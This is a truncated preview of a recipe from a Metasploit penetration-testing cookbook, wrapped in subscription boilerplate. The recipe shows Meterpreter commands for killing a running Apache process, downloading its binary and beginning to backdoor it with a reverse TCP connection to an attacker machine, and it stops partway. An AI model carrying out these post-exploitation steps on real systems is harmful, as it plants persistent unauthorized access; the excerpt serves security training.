O'Reilly logo

Metasploit Penetration Testing Cookbook - Third Edition by Monika Agarwal, Abhinav Singh, Daniel Teixeira

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

How to do it...

  1. Since we cannot backdoor a binary while it is running, the first thing we need to do is to kill the Apache process (httpd.exe), using the kill command followed by the PID of the process:
meterpreter > kill 3820Killing: 3820meterpreter >
  1. Then, we use the download command within meterpreter to download the service binary we want to backdoor:
meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe[*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe...msf exploit(ms17_010_eternalblue) > 

To backdoor the service, we will use msfconsole, with a reverse TCP.

  1. Set the listen address to our Kali Linux machine IP address and use the generate command to backdoor the binary, using the -a

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required